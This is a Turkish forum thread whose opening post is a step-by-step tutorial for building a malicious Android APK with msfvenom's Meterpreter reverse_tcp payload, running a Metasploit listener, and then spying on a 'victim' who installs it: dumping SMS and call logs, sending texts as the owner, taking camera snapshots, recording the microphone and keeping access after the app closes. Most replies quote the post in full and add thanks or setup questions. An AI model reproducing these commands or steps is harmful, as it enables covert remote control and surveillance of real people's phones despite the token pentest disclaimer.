Android Telefon Sızma Testi

trBozkurtx

Yeni üye
6 Haz 2022
46
10
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
 

ccandolu

Yeni üye
23 Ocak 2023
25
15
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
Eline sağlık
 

DJJan201

Üye
2 Eki 2022
122
27
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
Elinize sağlık
 

Muslukcu

Katılımcı Üye
17 Kas 2021
699
264
Tesisat dükkanı
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
Eline sağlik
 

Skrsky1

Üye
21 Haz 2021
147
27
23
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
hocam ayrıstırma hatası verıyor ne yapmalıyım
 

S M E R T

Yeni üye
11 Ocak 2023
6
1
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
Selam. "Permission denided /root/Desktop/yazğm.isim" hatasə alıyorum izin verilmedi diyor ne yapa bilirim?
 

fayrtek

Uzman üye
9 Nis 2021
1,169
385
23
İnternetin Derinliklerinde...
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
vakti gelince bir deneyeceğim :)

eline sağlık
 

mertarsln

Üye
31 Eki 2022
87
36
Dubai
Merhaba arkadaşlar bugün sizlere android telefonlara sızmak için kullanılan bir yöntemden bahsetmek istiyorum
öncelikle Metasploitten birazcık bahsedeyim linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır.
.
.
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
.
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
.
msfvenom -p android/meterpreter/reverse_tcp LHOST=(siz gireceksiniz) LPORT=4444 R > Desktop/test.apk
.
1.png

.
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş olacaktır
.
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
.
Daha sonra msfconsole yazarak yavaştan başlıyoruz.

2.png

.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit

3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
3.png

.
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla
4.png

.
“help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.

check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.

Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
.
BU bilgiler telefonlara girmek için deil sızma testleri için kullanılması için verilmiştir
Reis yakalanıyor virüs
 
Üst

